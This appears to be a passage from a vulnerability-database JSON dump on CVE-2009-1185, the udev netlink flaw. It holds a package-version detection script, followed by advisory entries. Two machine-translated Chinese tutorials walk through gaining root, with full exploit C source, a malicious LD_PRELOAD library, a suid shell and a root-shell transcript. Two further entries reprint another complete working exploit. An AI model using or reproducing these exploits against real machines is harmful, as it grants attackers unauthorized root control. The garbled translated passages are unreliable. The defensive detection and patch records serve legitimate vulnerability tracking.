((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml-doc\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml-dev\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnscache-run\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"djbdns\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbndns\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sork-passwd-h3\", ver:\"3.0-2+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-gnome-support\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-text\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-3ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-3ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-4ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-4ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-6ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-6ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-10-29T18:12:03", "description": "Author: Liang increased sea \nArticle source: http://s-logs.com/2009/04/linux-udev.html \nCopyright: can any reproduced, reprinted, please be sure to hyperlink marked article origin and author information and this statement \nVulnerability relevant information may be in the following link to obtain: \n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 \nhttp://www.linux-magazine.com/online/news/local_root_exploit_in_udev \nhttp://www.debian.org/security/2009/dsa-1772 \nhttp://milw0rm.com/exploits/8478 \n\nTest method: \n\nDownload the following script file: \n\nexploit.sh \n\nPlaced in a directory, backup. \n\ncat /proc/net/netlink \n\nGet the following return: \n\nuser@debian:~/attack$ cat /proc/net/netlink \nsk Eth Pid Groups Rmem Wmem Dump Locks \nf79e8200 0 2 7 8 4 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 2 \nf7a10200 0 2 7 7 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 2 \ndfb4ca00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 \ndff58400 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 \ndff7a800 9 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 \ndff71e00 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 \nf75dd200 1 5 1 1 7 5 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 2 \ndfb4c800 1 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 \ndffb6a00 1 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 \n\nJust download the sh file in the directory execute: \n\nsh exploit.sh 2 7 8 4 \n\nBehind the numbers is the netlink pid, as shown in the previous example returns has multiple, multiple attempts. 2 7 8 to 4, 2 7 7 1, The 1 1 7 5, can to try it out. \n\nThe script will generate C files and calls GCC to compile, then execution. If the host does not support GCC, you can modify the code to try other compilers, or in the local compiled, upload the binary version try. \n\nI'm trying to 1 1 7 5 success see the # end of the shell up you know what it means, Oh it. \n\nuser@debian:~/attack$ sh exploit.txt 1 1 7 5 \nsuid. c: In function \u9213 ain? \nsuid. c:3: warning: incompatible implicit declaration of built-in function \u920b xecl? \nsh-3.2# id \nuid=0(root) gid=0(root) groups=2 0(dialout),2 4(cdrom),2 5(floppy),2 9(audio),4 4(video),4 6(plugdev),1 0 6(netdev),1 0 9(powerdev),1 0 0 0(user) \n\n\nPlease readers do not used for illegal use, only for testing your own system is also the presence of this vulnerability. If there is, the more timely upgrade of the udev package, or upgrade the entire system.\n", "cvss3": {}, "published": "2009-08-06T00:00:00", "type": "myhack58", "title": "linux udev permissions vulnerability testing methods-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2009-08-06T00:00:00", "id": "MYHACK58:62200924189", "href": "http://www.myhack58.com/Article/html/3/62/2009/24189.htm", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-12T17:51:41", "description": "Vulnerability description: since udev does not confirm the NETLINK message is derived from the kernel space, so it can be passed from the user space sends a NETLINK message so that a local user to obtain root privileges. \nSpecific information, please see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 \nBelow we get into the combat demo: \n! [](/Article/UploadPic/2009-5/200951402425403.jpg) \nThis vulnerability is 2 0 0 9 year 4 month 2 day 0 in the milw0rm posted on, the EXP the author is Kcope, we directly use his EXP. \nFirst, we need to first compile it EXP, according to the following figure for the format, you need to compile three files. \n! [](/Article/UploadPic/2009-5/200951402425738.jpg)secondly, to take advantage of this vulnerability, we must know the NETLINK Socket's PID, there are two ways, first with\u201ccat /proc/net/netlink\u201ccommand to view, the second may use\u201cps-aux | grep \"udevd\"to get the udevd PID, but usually we need to the NETLINK Socket's PID is the udevd PID minus 1. As shown below, here we have the NETLINK Socket's PID is 2 2 1 0, and the udevd PID is 2 2 1 to 1. \n! [](/Article/UploadPic/2009-5/200951402426155.jpg)the best, let us use our compiled EXP to elevated it, put you get the NETLINK Socket's PID as the first parameter, as shown in Figure, let us look at the effect: \n\nYou can see that we've successfully gained root access. over! \nAppendix: EXP source code as follows \nudev. c#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef NETLINK_KOBJECT_UEVENT \n#define NETLINK_KOBJECT_UEVENT 1 5 \n#endif \n\n#define SHORT_STRING 6 4 \n#define MEDIUM_STRING 1 2 8 \n#define BIG_STRING 2 5 6 \n#define LONG_STRING 1 0 2 4 \n#define EXTRALONG_STRING 4 0 9 6 \n#define TRUE 1 \n#define FALSE 0 \n\nint socket_fd; \nstruct sockaddr_nl address; \nstruct msghdr msg; \nstruct iovec\u7ed3\u6784\u5305\u542b\u5f85\u53d1\u9001\u6570\u636e\u7684\u7de9\u51b2\u533a\u5730\u5740\u548c\u957f\u5ea6 \u3002 iovec iovector; \nint sz = 6 4*1 0 2 4; \n\nmain(int argc, char **argv) { \nchar sysfspath[SHORT_STRING]; \nchar subsystem[SHORT_STRING]; \nchar event[SHORT_STRING]; \nchar major[SHORT_STRING]; \nchar minor[SHORT_STRING]; \n\nsprintf(event, \"add\"); \nsprintf(subsystem, \"block\"); \nsprintf(sysfspath, \"/dev/foo\"); \nsprintf(major, \"8\"); \nsprintf(minor, \"1\"); \n\nmemset(&address, 0, sizeof(address)); \naddress. nl_family = AF_NETLINK; \naddress. nl_pid = atoi(argv[1]); \naddress. nl_groups = 0; \n\nmsg. msg_name = (void*)&address; \nmsg. msg_namelen = sizeof(address); \nmsg. msg_iov = &iovector; \nmsg. msg_iovlen = 1; \n\nsocket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); \nbind(socket_fd, (struct sockaddr *) &address, sizeof(address)); \n\nchar message[LONG_STRING]; \nchar *mp; \n\nmp = message; \nmp += sprintf(mp, \"%s@%s\", event, sysfspath) +1; \nmp += sprintf(mp, \"ACTION=%s\", event) +1; \nmp += sprintf(mp, \"DEVPATH=%s\", sysfspath) +1; \nmp += sprintf(mp, \"MAJOR=%s\", major) +1; \nmp += sprintf(mp, \"MINOR=%s\", minor) +1; \nmp += sprintf(mp, \"SUBSYSTEM=%s\", subsystem) +1; \nmp += sprintf(mp, \"LD_PRELOAD=/tmp/libno_ex. so. 1. 0\") +1; \n\niovector. iov_base = (void*)message; \niovector. iov_len = (int)(mp-message); \n\nchar *buf; \nint buflen; \nbuf = (char *) &amp; msg; \nbuflen = (int)(mp-message); \n\nsendmsg(socket_fd, &msg, 0); \n\nclose(socket_fd); \n\nsleep(1 0); \nexecl(\"/tmp/suid\", \"suid\", (void*)0); \n} \nprogram. c#include \n#include \n#include \n#include \n\nvoid _init() \n{ \nsetgid(0); \nsetuid(0); \nunsetenv(\"LD_PRELOAD\"); \nexecl(\"/bin/sh\",\"sh\",\"-c\",\"chown root:root /tmp/suid; chmod +s /tmp/suid\",NULL); \n} \nsuid. cint main(void) { \nsetgid(0); setuid(0); \nexecl(\"/bin/sh\",\"sh\",0); }\n", "cvss3": {}, "published": "2009-05-13T00:00:00", "type": "myhack58", "title": "Linux udev local vulnerabilities to elevate privileges.-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2009-05-13T00:00:00", "id": "MYHACK58:62200923218", "href": "http://www.myhack58.com/Article/html/3/62/2009/23218.htm", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:36:00", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66499", "id": "SSV:66499", "sourceData": "\n /*\r\n * cve-2009-1185.c\r\n *\r\n * udev < 141 Local Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185\r\n *\r\n * udev before 1.4.1 does not verify whether a NETLINK message originates \r\n * from kernel space, which allows local users to gain privileges by sending \r\n * a NETLINK message from user space.\r\n *\r\n * Notes:\r\n * \r\n * An alternate version of kcope's exploit. This exploit leverages the \r\n * 95-udev-late.rules functionality that is meant to run arbitrary commands \r\n * when a device is removed. A bit cleaner and reliable as long as your \r\n * distro ships that rule file.\r\n *\r\n * Tested on Gentoo, Intrepid, and Jaunty.\r\n *\r\n * Usage:\r\n *\r\n * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, \r\n * usually is the udevd PID minus 1) as argv[1].\r\n *\r\n * The exploit will execute /tmp/run as root so throw whatever payload you \r\n * want in there.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/socket.h>\r\n#include <linux/types.h>\r\n#include <linux/netlink.h>\r\n\r\n#ifndef NETLINK_KOBJECT_UEVENT\r\n#define NETLINK_KOBJECT_UEVENT 15\r\n#endif\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint sock;\r\n\tchar *mp, *err;\r\n\tchar message[4096];\r\n\tstruct stat st;\r\n\tstruct msghdr msg;\r\n\tstruct iovec iovector;\r\n\tstruct sockaddr_nl address;\r\n\r\n\tif (argc < 2) {\r\n\t\terr = "Pass the udevd netlink PID as an argument";\r\n\t\tprintf("[-] Error: %s\\n", err);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) &&\r\n\t (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) {\r\n\t\terr = "Required 95-udev-late.rules not found";\r\n\t\tprintf("[-] Error: %s\\n", err);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (stat("/tmp/run", &st) == -1) {\r\n\t\terr = "/tmp/run does not exist, please create it";\r\n\t\tprintf("[-] Error: %s\\n", err);\r\n\t\texit(1);\r\n\t}\r\n\tsystem("chmod +x /tmp/run");\r\n\r\n\tmemset(&address, 0, sizeof(address));\r\n\taddress.nl_family = AF_NETLINK;\r\n\taddress.nl_pid = atoi(argv[1]);\r\n\taddress.nl_groups = 0;\r\n\r\n\tmsg.msg_name = (void*)&address;\r\n\tmsg.msg_namelen = sizeof(address);\r\n\tmsg.msg_iov = &iovector;\r\n\tmsg.msg_iovlen = 1;\r\n\r\n\tsock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);\r\n\tbind(sock, (struct sockaddr *) &address, sizeof(address));\r\n\r\n\tmp = message;\r\n\tmp += sprintf(mp, "remove@/d") + 1;\r\n\tmp += sprintf(mp, "SUBSYSTEM=block") + 1;\r\n\tmp += sprintf(mp, "DEVPATH=/dev/foo") + 1;\r\n\tmp += sprintf(mp, "TIMEOUT=10") + 1;\r\n\tmp += sprintf(mp, "ACTION=remove") +1;\r\n\tmp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;\r\n\r\n\tiovector.iov_base = (void*)message;\r\n\tiovector.iov_len = (int)(mp-message);\r\n\r\n\tsendmsg(sock, &msg, 0);\r\n\r\n\tclose(sock);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-04-30]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-66499", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:51:55", "description": "No description provided by source.", "cvss3": {}, "published": "2009-05-01T00:00:00", "title": "Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2009-05-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11156", "id": "SSV:11156", "sourceData": "\n /*\r\n * cve-2009-1185.c\r\n *\r\n * udev < 141 Local Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185\r\n *\r\n * udev before 1.4.1 does not verify whether a NETLINK message originates \r\n * from kernel space, which allows local users to gain privileges by sending \r\n * a NETLINK message from user space.\r\n *\r\n * Notes:\r\n * \r\n * An alternate version of kcope's exploit. This exploit leverages the \r\n * 95-udev-late.rules functionality that is meant to run arbitrary commands \r\n * when a device is removed. A bit cleaner and reliable as long as your \r\n * distro ships that rule file. The exploit will execute /tmp/run as root \r\n * so throw whatever payload you want in there.\r\n *\r\n * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, \r\n * usually is the udevd PID minus 1) as argv[1].\r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/types.h>\r\n#include <linux/netlink.h>\r\n\r\n#ifndef NETLINK_KOBJECT_UEVENT\r\n#define NETLINK_KOBJECT_UEVENT 15\r\n#endif\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint sock;\r\n\tchar *mp;\r\n\tchar message[4096];\r\n\tstruct msghdr msg;\r\n\tstruct iovec iovector;\r\n\tstruct sockaddr_nl address;\r\n\r\n\tmemset(&address, 0, sizeof(address));\r\n\taddress.nl_family = AF_NETLINK;\r\n\taddress.nl_pid = atoi(argv[1]);\r\n\taddress.nl_groups = 0;\r\n\r\n\tmsg.msg_name = (void*)&address;\r\n\tmsg.msg_namelen = sizeof(address);\r\n\tmsg.msg_iov = &iovector;\r\n\tmsg.msg_iovlen = 1;\r\n\r\n\tsock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);\r\n\tbind(sock, (struct sockaddr *) &address, sizeof(address));\r\n\r\n\tmp = message;\r\n\tmp += sprintf(mp, "a@/d") + 1;\r\n\tmp += sprintf(mp, "SUBSYSTEM=block") + 1;\r\n\tmp += sprintf(mp, "DEVPATH=/dev/foo") + 1;\r\n\tmp += sprintf(mp, "TIMEOUT=10") + 1;\r\n\tmp += sprintf(mp, "ACTION=remove") +1;\r\n\tmp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;\r\n\r\n\tiovector.iov_base = (void*)message;\r\n\tiovector.iov_len = (int)(mp-message);\r\n\r\n\tsendmsg(sock, &msg, 0);\r\n\r\n\tclose(sock);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11156", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "android": [{"lastseen": "2021-07-28T14:34:31", "description": "udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.", "cvss3": {}, "published": "2010-07-15T00:00:00", "type": "android", "title": "exploid udev", "bulletinFamily": "software", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185"], "modified": "2013-09-04T00:00:00", "id": "ANDROID:EXPLOID_UDEV", "href": "http://www.androidvulnerabilities.org/vulnerabilities/exploid_udev.html", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:12", "description": "[095-14.20]\n- fix for CVE-2009-1185 (bug #495051)\n- Resolves: rhbz#495055 ", "cvss3": {}, "published": "2009-04-16T00:00:00", "type": "oraclelinux", "title": "udev security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-1185"], "modified": "2009-04-16T00:00:00", "id": "ELSA-2009-0427", "href": "http://linux.oracle.com/errata/ELSA-2009-0427.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2021-07-28T14:33:31", "description": "**Name**| udevd \n---|--- \n**CVE**| CVE-2009-1185 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| udevd \n**Notes**| References: ['http://c-skills.blogspot.com/2009/04/udev-trickery-cve-2009-1185-and-cve.html'] \nCVE Name: CVE-2009-1185 \nVENDOR: Linux \nNotes: \nDate public: 04-17-2009 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 \nCVSS: 7.2 \n\n", "cvss3": {}, "published": "2009-04-17T14:30:00", "type": "canvas", "title": "Immunity Canvas: UDEVD", "bulletinFamily": "exploit", "hackapp": {}, 